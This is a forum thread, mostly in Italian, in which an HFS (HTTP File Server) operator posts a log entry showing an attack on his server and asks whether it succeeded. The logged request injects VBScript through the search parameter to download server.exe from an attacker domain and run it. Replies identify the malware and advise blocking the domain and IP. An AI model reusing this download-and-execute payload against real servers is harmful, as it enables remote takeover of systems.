rejetto forum
Software => Other languages => HFS ~ HTTP File Server => Italiano => Topic started by: _KrustY_ on January 16, 2018, 06:02:41 PM
-
BuonGiorno
uso da tempo HFS su un server dedicato con Windows server 2012
tengo sempre aggiornato HFS, ora ho la 2.3k
2 giorni fa ho trovato nel log questi comandi
Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe%22,0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}
Ho cercato il file server.exe in c: ma non c'è e non è nemmeno aperto come processo
Vorrei capire se questo tentativo di esecuzione del file è andato a buon fine e se è possibile bloccare qualsiasi richiesta di esecuzione di script o comandi shell
Grazie
-
Certainly, this is an attempt to hack the server
the request included in the script come from china
Domain: yamanbeisi.com
IP Address: 103.27.208.67
Region: Chengdu (CN)
the file contains the following schema TR.Crypt.Xpack.srkhd
look at this report
http://r.virscan.org/report/eb5138fac75c231d89b69d93612310f2
the best thing to do is to have a good antivirus always updated, and to block the domain name of the link as well as the associated ip
-
Ok Grazie Mars
Vorrei capire se c'è il modo di bloccare qualsiasi richiesta di esecuzione di script o comandi shell in HFS
Grazie
Ciaoo
-
tradotto con google tanslate:
hfs è teoricamente protetto per non eseguire comandi come la macro del modello {. ... .}, potrebbero esserci varianti che non sono mai state testate o segnalate per rejetto. Dovresti avere la riga di comando completa del tentativo fraudolento di analizzare gli effetti, se non hai trovato una traccia di un programma, è che probabilmente il tentativo è fallito.
cosa fare mentre si attende che rejetto diventi consapevole della propria avventura è registrare il server di hosting in una lista di ban, così come l'indirizzo ip corrispondente in un firewall